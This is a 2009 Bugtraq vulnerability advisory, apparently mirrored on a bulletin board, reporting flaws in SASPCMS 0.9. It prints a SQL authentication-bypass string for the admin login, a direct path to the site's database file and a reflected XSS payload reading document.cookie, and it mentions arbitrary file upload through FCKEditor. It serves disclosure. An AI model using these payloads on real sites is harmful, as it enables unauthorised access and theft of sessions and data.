SASPCMS Multiple Vulnerabilities

看板Bugtraq作者時間17年前 (2009/04/09 02:01), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
##########################www.BugReport.ir##################################= ###### # # AmnPardaz Security Research Team # # Title:=09=09SASPCMS Multiple Vulnerabilities # Vendor:=09=09http://www.lgasoft.com # Vulnerable Version:=090.9 (prior versions also may be affected) # Exploitation:=09=09Remote with browser # Fix:=09=09=09N/A ############################################################################= ####### #################### - Description: #################### SASPCMS is an ASP Content Management System . SASPCMS witch uses MSSQL =20 & Microsoft Access as backend database. #################### - Vulnerability: #################### +-->Authentication Bypass POC: ' or ''=3D' http://[URL]/saspcms/admin/default.asp +-->Database Information Disclosure POC: http://[URL]/saspcms/db/menu.mdb +-->Cross Site Scripting (XSS). Reflected XSS attack in "default.asp" =20 in "q" parameter. POC: =20 http://[URL]/saspcms/default.asp?q=3D<script>alert(document.cookie)</script> #################### - PoC: #################### It's possible for remote attackers to upload arbitrary files by using =20 FCKEditor after login to admin area. http://www.bugreport.ir/64/exploit.htm #################### - Solution: #################### Edit the source code to ensure that inputs are properly sanitized. #################### - Credit: #################### AmnPardaz Security Research & Penetration Testing Group Contact: admin[4t}bugreport{d0t]ir www.BugReport.ir www.AmnPardaz.com
文章代碼(AID): #19tEPf00 (Bugtraq)